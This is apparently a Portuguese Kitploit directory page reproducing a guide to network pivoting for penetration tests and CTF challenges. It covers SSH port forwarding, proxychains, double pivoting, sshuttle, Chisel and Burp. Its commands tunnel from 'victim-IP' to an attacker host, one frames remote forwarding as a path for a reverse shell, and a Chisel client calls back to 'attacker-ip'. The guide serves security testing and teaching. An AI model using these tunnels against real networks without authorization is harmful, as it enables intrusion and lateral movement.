Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pentest-pivoting — Um guia compacto sobre pivô de rede para testes de penetração / desafios CTF. | Kitploit
Ferramentas/GitHubGitHub/t3l3machus/pentest-pivoting
Proxies Web e InterceptaçãoMovimento LateralSegurança de RedeCTFTestes de PenetraçãoAprendizado e EducaçãoRed TeamingRecursos Curados
GitHubt3l3machus/pentest-pivoting

pentest-pivoting

Um guia compacto sobre pivô de rede para testes de penetração / desafios CTF.

Ver Repositório
22844há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Guia de Pivoting

Índice

  1. Notas Importantes
  2. Redirecionamento Dinâmico de Portas via SSH
  3. Redirecionamento Remoto de Portas via SSH
  4. Redirecionamento Local de Portas via SSH
  5. Pivoting Duplo
  6. sshuttle
  7. Chisel
  8. Usando o Burpsuite como Proxy
  9. Recursos Úteis

Notas Importantes

  • Não use requisições de eco ICMP (ping) para testar proxies SOCKS.
    SOCKS é um protocolo da Internet que troca pacotes de rede entre um cliente e um servidor por meio de um servidor proxy. Na prática, um servidor SOCKS faz proxy de conexões TCP para um endereço IP arbitrário e fornece um meio para que pacotes UDP sejam encaminhados. Você deve testá-lo usando um protocolo baseado em TCP (por exemplo, tente usar SSH ou envie uma requisição HTTP GET para um host através do túnel de pivoting).

  • O NMAP deve ser usado com varredura de conexão TCP (-sT) e sem ping (-Pn)
    Isso também se aplica às varreduras de versão (-sV) e de scripts (-sC). Eles devem ser usados em combinação com -sT e -Pn.
    Exemplos:

    root@kitploit:~
    proxychains nmap -sT -Pn -p- x.x.x.x
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
    

    Dica: Você pode enviar o naabu para a máquina da vítima e escanear como um chefe.

  • Usando scripts e binários com proxychains
    Uma dica para usar o proxychains é garantir que, se você estiver executando um programa interpretado (como um script Python), seja uma boa ideia referenciar explicitamente o binário do Python antes do script, mesmo que o script comece com um hash bang, por exemplo:

    root@kitploit:~
    proxychains4 [-q -f proxychains.conf] python python_script.py
    

    Sem essa referência específica ao interpretador do script, às vezes o tráfego gerado pelo script não será roteado pelo proxy como você pretendia, e a conexão de rede falhará. Fonte da Dica

  • Descomente a linha "quite mode" no /etc/proxychains.conf para evitar um stdout que pode ser frustrante às vezes.
    Isso é apenas uma sugestão.

Redirecionamento Dinâmico de Portas via SSH

Permite criar um socket na máquina local (cliente ssh), que atua como um servidor proxy SOCKS. Quando um cliente se conecta a essa porta, a conexão é encaminhada para a máquina remota (servidor ssh), de onde é então encaminhada para uma porta dinâmica na máquina de destino.

Como configurar:

  1. Edite o /etc/proxychains.conf e implemente o seguinte:

    • Descomente a linha Dynamic chain.
    • Comente as linhas Strict chain e Random chain.
    • Adicione a linha socks4 127.0.0.1 9050 ao final do documento (lista de proxies), salve e feche o arquivo. *Você pode, é claro, usar uma porta diferente.
  2. Configure o Redirecionamento Dinâmico de Portas via SSH:

root@kitploit:~
ssh -D 127.0.0.1:9050 user@victim-IP

Exemplos de uso:
Com x.x.x.x sendo o endereço IP de um host que pertence à rede tunelada:

root@kitploit:~
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh [email protected]

Para usar o firefox através do túnel:

root@kitploit:~
proxychains firefox

Redirecionamento Remoto de Portas via SSH

Se você está procurando como obter uma reverse shell através de um túnel de pivoting, é disso que você precisa. Ele permite encaminhar uma porta na máquina remota (vítima) para uma porta na máquina local (atacante).

Como configurar:

  1. Conecte-se via SSH à máquina da vítima.

  2. Edite o /etc/ssh/sshd_config e implemente o seguinte:

    • Descomente a linha GatewayPorts no e altere para Yes. Salve e feche o arquivo.

    *Isso é muito importante e muitos guias na internet não mencionam isso. Se você não fizer isso, só conseguirá configurar o túnel em 127.0.0.1 em vez de 0.0.0.0, o que acabará não encaminhando o tráfego quando ele se originar de qualquer host, exceto localhost.

    • Reinicie o serviço SSH para que as alterações tenham efeito. sudo service ssh restart
    • Saia e volte para sua máquina.
  3. Configure o Redirecionamento Remoto de Portas via SSH:
    Essencialmente, depois de configurá-lo como mencionado, o comando é tão simples quanto isso:

root@kitploit:~
ssh -R 2222:*:2222 user@victim-IP

Para testar se funciona, você pode fazer o seguinte:
Configure um listener (por exemplo, netcat) na sua máquina atacante (na porta que você configurou para o redirecionamento remoto, neste exemplo 2222) e faça uma requisição da máquina da vítima para ela mesma (localhost). Neste exemplo, seria nc 127.0.0.1 2222. Se a sua máquina atacante receber a conexão, isso significa que a) funciona e b) toda conexão dos hosts de pivoting para victimip:2222 será encaminhada para a máquina atacante.

Você pode configurar várias portas assim:

root@kitploit:~
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP

Atenção: As requisições de hosts externos (rede de pivoting) devem ser direcionadas ao IP da vítima para serem encaminhadas de volta para a máquina atacante.

*Você também pode implementar o Redirecionamento Remoto de Portas conectando-se via SSH da máquina da vítima para a máquina atacante.

Redirecionamento Local de Portas via SSH

O redirecionamento local de portas permite encaminhar uma porta na máquina local (atacante) para uma porta na máquina remota (vítima). Particularmente útil para escanear portas locais na vítima.

Uso:

root@kitploit:~
ssh user@victim-IP -L 8888:127.0.0.1:8086

Agora você pode usar, por exemplo, o nmap para escanear a porta 8086 na máquina da vítima assim:

root@kitploit:~
nmap -Pn -n -p8888 -sV 127.0.0.1

Pivoting Duplo

Um exemplo de como implementar pivoting duplo com Redirecionamento Dinâmico de Portas via SSH e Proxychains.

Conceito:
Suponha que temos as seguintes 4 máquinas.

IPFunção
10.10.10.10Atacante
10.10.10.11Jumphost1
172.16.1.12Jumphost2
172.16.2.13Jumphost3

O atacante pode alcançar o Jumphost1.
O Jumphost1 pode alcançar o Jumphost2.
O Jumphost2 pode alcançar o Jumphost3.

  1. Para alcançar o Jumphost2, implemente as instruções de Redirecionamento Dinâmico de Portas via SSH mencionadas anteriormente, contra o Jumphost1.
  2. Para alcançar o Jumphost3, edite o /etc/proxychains.conf e adicione outra entrada de proxy ao final do documento. O final do seu proxychains.conf agora ficará mais ou menos assim:
root@kitploit:~
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
  1. Conecte-se via SSH ao Jumphost1 e configure outro Redirecionamento Dinâmico de Portas contra o Jumphost2 (a porta local que você escolher deve ser a mesma configurada para a sua segunda entrada de proxy no proxychains.conf):
root@kitploit:~
ssh -D 127.0.0.1:9999 user@Jumphost2

Agora você deve conseguir alcançar o Jumphost3.

sshuttle

O sshuttle permite criar uma conexão VPN da sua máquina para qualquer servidor remoto via ssh, desde que esse servidor tenha python 2.3 ou superior. Para funcionar, você deve ter acesso root na máquina local, mas pode ter uma conta normal no servidor. É válido executar o sshuttle mais de uma vez simultaneamente em uma única máquina cliente, conectando-se a um servidor diferente a cada vez, para que você possa estar em mais de uma VPN ao mesmo tempo. Consulte o repositório do sshuttle no github.

Uso:
Supondo que queremos fazer pivoting para 172.16.2.0/16:

root@kitploit:~
sshuttle -vvr root@victim 172.16.2.0/16

Se você quiser usar chave ssh:

root@kitploit:~
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16

Chisel

O Chisel é um túnel TCP/UDP rápido, transportado por HTTP, protegido por SSH. Um único executável que inclui tanto o cliente quanto o servidor. Escrito em Go (golang). É insanamente incrível e útil.

Instalação:
Você pode instalar facilmente o chisel no kali:

root@kitploit:~
apt install chisel

Para usá-lo, você também precisa enviar o binário do chisel para a vítima. Você pode baixar versões pré-compiladas aqui.

Exemplo de redirecionamento local de portas
Na sua máquina atacante:

root@kitploit:~
chisel server -p 8000 --reverse

Na máquina da vítima:

root@kitploit:~
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443

Isso vai encaminhar o tráfego da porta 1234 da máquina atacante para a porta 8443 da máquina da vítima.

Usando o Burpsuite como Proxy

O Burpsuite suporta a capacidade de configurar proxies, um recurso incrivelmente útil e poderoso.

Como configurar:
Abra o Burpsuite e implemente o seguinte:

  • Vá em Proxy/Options e clique em add na seção Proxy Listeners.
  • Defina uma porta de binding e uma interface.
  • na segunda aba, defina o host e a porta para os quais você quer redirecionar o tráfego.

Em combinação com a configuração de um Redirecionamento Dinâmico de Portas via SSH ou sshuttle, você agora pode usar o Burpsuite para fazer pivoting do tráfego para os hosts desejados, enviando tráfego para a sua porta de binding no localhost. Um exemplo útil com brute de diretórios do gobuster através do túnel (Supondo que você configurou a porta 2222 como a porta de redirecionamento):

root@kitploit:~
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt

Recursos Úteis

  • https://artkond.com/2017/03/23/pivoting-guide/
  • https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
  • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
Baixar ferramenta